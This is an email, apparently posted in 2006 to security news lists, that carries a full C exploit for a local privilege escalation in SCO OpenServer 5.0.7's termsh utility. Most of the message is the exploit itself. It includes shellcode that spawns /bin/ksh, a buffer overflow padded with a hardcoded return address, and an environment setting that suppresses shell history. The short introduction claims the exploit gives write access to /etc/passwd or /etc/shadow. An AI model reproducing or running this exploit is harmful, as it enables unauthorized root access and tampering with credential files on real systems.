SCO Openserver 5.0.x exploit
From: "rod hedor" <rodhedor@hotmail.com.>
To: news@SecuriTeam.com, news@securityfocus.com,
Subject: SCO Openserver 5.0.x exploit
Date: Mon, 02 Jan 2006 23:43:53 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
X-OriginalArrivalTime: 02 Jan 2006 23:43:53.0890 (UTC) FILETIME=[63E41020:01C60FF6]
X-Virus-Scanned: antivirus-gw at tyumen.ru
hi all
I RoD hEDoR
my web http://www.lezr.com/vb
------------[L - G - H]----------------
SCO Openserver 5.0.x exploit
attacker allowing for use this
flaw to gain write access to /etc/passwd or /etc/shadow
#include <stdio.h>
#include <stdlib.h>
char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90"
"\x68\xff\xf8\xff\x3c\x6a\x65\x89"
"\xe6\xf7\x56\x04\xf6\x16\x31\xc0"
"\x50\x68""/ksh""\x68""/bin""\x89"
"\xe3\x50\x50\x53\xb0\x3b\xff\xd6";
int main(int argc,char* argv[])
{
char* buffer;
char* arg = "-o";
char *env[] = {"HISTORY=/dev/null",NULL};
long eip,ptr;
int i;
printf("[ SCO Openserver 5.0.7 termsh local privilege escalation
exploit\n");
if(argc < 2)
{
printf("[ Error : [path]\n[ Example: %s
/opt/K/SCO/Unix/5.0.7Hw/usr/lib/sysadm/termsh\n",argv[0]);
exit(0);
}
eip = 0xa2080853;
buffer = malloc(7449 + strlen(shellcode));
memset(buffer,'\x00',7449 + strlen(shellcode));
ptr = (long)buffer + strlen(shellcode);
strncpy(buffer,shellcode,strlen(shellcode));
for(i = 1;i <= 1862;i++)
{
memcpy((char*)ptr,(char*)&eip,4);
ptr = ptr + 4;
}
execle(argv[1],argv[1],arg,buffer,NULL,env);
exit(0);
}
_________________________________________________________________
Don't just search. Find. Check out the new MSN Search!
http://search.msn.click-url.com/go/onm00200636ave/direct/01/
